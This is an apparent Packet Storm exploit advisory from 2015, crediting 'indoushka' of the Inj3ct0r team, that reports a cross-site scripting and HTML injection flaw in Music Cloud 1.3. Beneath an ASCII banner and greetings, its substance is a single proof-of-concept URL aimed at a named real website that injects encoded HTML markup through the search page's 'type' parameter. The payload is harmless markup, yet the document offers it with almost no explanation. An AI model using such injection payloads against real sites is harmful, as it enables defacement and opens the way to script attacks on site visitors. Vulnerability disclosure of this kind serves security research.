Music Cloud 1.3 Cross Site Scripting

2015-12-21T00:00:00
ID PACKETSTORM:135023
Type packetstorm
Reporter indoushka
Modified 2015-12-21T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1   
1 /' \ __ /'__`\ /\ \__ /'__`\ 0   
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1   
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0   
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1   
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0   
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1   
1 \ \____/ >> Exploit database separated by exploit 0   
0 \/___/ type (local, remote, DoS, etc.) 1   
1 1   
0 [+] Site : http://0day.today 0   
1 [+] Support e-mail : submit[at]inj3ct0r.com 1   
0 0   
1 #################################### 1   
0 I'm indoushka member from Inj3ct0r Team 1   
1 #################################### 0   
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
| # Title : Music Cloud 1.3 Xss/HTML Inject Vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on: windows 8.1 Français V.(Pro)  
| # Vendor : Music Cloud Player • by Humain2  
========================================================================  
  
Poc :  
  
http://www.mtenlinea.com//music/ss/search.php?page=1&query=Grimes&resultsPerPage=10&type=All%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E&username=null  
  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com   
Hussin-X *D4NB4R* KnocKout * https://www.corelan.be *  
---------------------------------------------------------------------------------------  
`